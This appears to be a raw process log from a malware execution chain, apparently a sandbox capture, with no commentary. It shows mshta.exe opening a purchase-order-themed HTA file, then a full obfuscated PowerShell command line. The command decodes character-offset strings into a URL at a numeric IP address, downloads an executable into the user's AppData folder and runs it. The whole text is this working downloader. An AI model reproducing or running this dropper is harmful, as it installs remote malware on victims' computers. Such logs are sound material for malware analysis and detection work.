mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\PO-54752454235.hta
1880powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes($Jz, $G)};function cVPGqauI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True){Start-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18407,18462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$gu = New-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,18469,18466,18462,18471,18477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$G = $gu.DownloadData($Nd);return $G};function KMIhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (KMIhcrUSa @(18465,18477,18477,18473,18419,18408,18408,18410,18417,18414,18407,18410,18418,18415,18407,18410,18410,18407,18410,18414,18410,18408,18466,18461,18467,18458,18408,18481,18436,18477,18483,18479,18461,18430,18472,18429,18426,18467,18437,18470,18479,18439,18407,18462,18481,18462));$JWZIMxNfA = $wGmFaIqRG + 'xKtzvdEoDAjLmvN.exe';DZzrEhDP $JWZIMxNfA $mVsYqYr;cVPGqauI $JWZIMxNfA;;;;}biUnSvy;
2080